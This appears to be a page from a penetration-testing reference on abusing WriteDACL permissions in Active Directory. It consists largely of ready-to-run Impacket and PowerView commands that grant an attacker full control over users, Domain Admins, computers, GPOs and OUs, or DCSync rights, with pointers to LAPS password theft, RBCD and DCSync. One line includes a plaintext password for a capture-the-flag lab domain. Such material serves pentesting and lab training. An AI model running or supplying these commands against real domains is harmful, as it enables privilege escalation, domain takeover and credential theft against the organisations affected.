WriteDACL
Information
With Write access to the target object’s DACL, you can grant yourself any privilege you want on the object.
Grant yourself FullControl of the user:
# Assigning FullControl permissions over the user with Impacket
impacket-dacledit -action write -rights FullControl -principal ryan -target ca_svc sequel.htb/ryan:WqSZAF6CysDQbGb3# Assigning GenericAll permissions over the user with PowerView
Add-DomainObjectAcl -TargetIdentity harmj0y -Rights AllSee here for exploitation options.
Grant yourself FullControl of the group:
# Powerview
Add-DomainObjectAcl -TargetIdentity "Domain Admins" -Rights WriteMembersThis can be leverage to add members to the group (see here).
Grant yourself FullControl of the computer:
# Assigning GenericAll permissions over the computer
Add-DomainObjectAcl -TargetIdentity windows01 -Rights AllThis can be leveraged to read the LAPS password or perform RBCD against the target host.
Grant yourself DCSync rights:
Add-DomainObjectAcl -TargetIdentity testlab.local -Rights DCSyncThis can be leveraged to perform a DCSync attack.
Grant yourself FullControl of the GPO:
Add-DomainObjectAcl -TargetIdentity TestGPO -Rights AllThis can be leveraged to edit the GPO and take over an object the GPO applies to.
Grant yourself FullControl of the OU:
Add-DomainObjectAcl -TargetIdentity <OU-GUID> -Rights AllThis can be leveraged to add a new ACE to the OU that inherits down to child objects so we can then take over those child objects.
Last updated
Was this helpful?